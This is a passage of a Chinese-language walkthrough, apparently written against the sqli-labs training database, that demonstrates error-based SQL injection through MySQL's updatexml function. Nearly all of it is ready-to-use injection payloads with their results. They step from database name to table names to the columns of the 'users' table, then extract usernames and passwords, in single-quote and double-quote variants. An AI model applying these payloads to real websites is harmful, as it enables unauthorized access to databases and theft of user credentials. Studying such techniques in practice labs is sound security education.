select -1 and updatexml(1,concat(0x7e,database()),1)
复制代码
结果:由于我们的第二个参数并不符合xpath语法的要求,以是产生报错执行第二个参数的语句
以是这题我们就可以利用报错注入
爆破数据库名
payload
?id=-1' and updatexml(1,concat(0x7e,database()),1) --+
复制代码
结果:得到数据库名security
爆破表名
payload
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+
复制代码
结果:得到表名emails,referers,uagents,users
爆破字段名
payload
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1) --+
复制代码
结果:成功得到字段名id,username,password
爆破数据
payload
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) --+
?id=-1" and updatexml(1,concat(0x7e,database()),1) --+
复制代码
结果:得到数据库名security
爆破表名
payload
?id=-1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+
复制代码
结果:得到表名emails,referers,uagents,users
爆破字段名
payload
?id=-1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1) --+
复制代码
结果:成功得到字段名id,username,password
爆破数据
payload
?id=-1" and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),1,32)),1) --+